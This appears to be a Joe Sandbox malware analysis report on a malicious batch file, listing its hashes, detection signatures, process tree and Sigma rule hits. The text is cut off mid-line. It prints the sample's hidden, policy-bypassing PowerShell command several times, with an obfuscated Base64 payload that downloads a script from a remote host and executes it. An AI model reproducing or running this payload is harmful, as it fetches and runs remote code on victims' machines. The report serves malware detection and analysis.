Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
launcher (1).bat

Overview

General Information

Sample name:launcher (1).bat
Analysis ID:1669989
MD5:30626221f424c91a9b503a49c29f2a80
SHA1:ef1aaef2d0993567f67bb4473ac1e44773f9fd8f
SHA256:c65fe988dd48cf30fa0fb559cad98035abc06b753fe39f89c0e15d47e55142b4
Tags:batuser-smica83
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Yara detected Obfuscated Powershell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • cmd.exe (PID: 8004 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8060 cmdline: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
launcher (1).batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Sigma Signatures

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
    Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
    Source: Process startedAuthor: frack113: Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=, CommandLine: powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc 